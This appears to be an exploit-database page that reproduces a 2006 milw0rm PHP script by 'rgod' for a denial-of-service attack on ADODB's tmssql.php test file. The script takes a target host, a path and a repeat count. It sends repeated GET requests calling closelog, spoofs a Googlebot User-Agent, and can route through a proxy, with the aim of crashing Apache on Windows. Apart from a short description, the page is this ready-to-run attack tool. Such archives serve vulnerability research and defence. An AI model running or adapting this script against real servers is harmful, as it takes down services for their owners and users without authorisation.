header-logo
Suggest Exploit
vendor:
N/A
by:
rgod
7,5
CVSS
HIGH
Denial of Service
N/A
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

ADODB tmssql.php Denial of Service

By sending multiple requests to the tmssql.php script, which allow execution of an arbitrary function without arguments, this will cause the Apache process to crash and to consume a large amount of memory.

Mitigation:

N/A
Source

Exploit-DB raw data:

#!/usr/bin/php -q -d short_open_tag=on
<?
echo "ADODB tmssql.php Denial of service\r\n";
echo "by rgod rgod@autistici.org\r\n";
echo "site: http://retrogod.altervista.org\r\n\r\n";

if ($argc<4) {
echo "Usage: php ".$argv[0]." host path redo OPTIONS\r\n";
echo "host:      target server (ip/hostname)\r\n";
echo "path:      path to ADODB\r\n";
echo "redo:      how many times?\r\n";
echo "Options:\r\n";
echo "   -p[port]:    specify a port other than 80\r\n";
echo "   -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /some_app/ 9999999\r\n";
echo "php ".$argv[0]." localhost /some_app/ 9999999 -p81\r\n";
echo "php ".$argv[0]." localhost /some_app/ 9999999 -P1.1.1.1:80\r\n";
die;
}
/*
  tested against Apache/1.3.27 (Win32) PHP/4.3.3
  
  closelog() func close the connection to the system logger, but if its handle
  is never initialized, Windows exception is raised by the php4ts.dll
  module at address 0x00000000100bf014.
  By sending multiple requests to the tmssql.php script, which allow
  execution of an arbitrary function without arguments, this will cause
  the Apache process to crash and to consume a large amount of memory
*/

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port."\r\n";
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';
	}
  }
  fputs($ock,$packet);
  fclose($ock);
}

$host=$argv[1];$path=$argv[2];$redo=$argv[3];
$port=80;$proxy="";
for ($i=4; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

for ($i=1; $i<=$redo; $i++)
{
$packet ="GET ".$p."include/adodb/tests/tmssql.php?do=closelog HTTP/1.0\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
echo $packet;
}
?>

# milw0rm.com [2006-04-09]

Navigation

Suggest Exploit

Services By CQR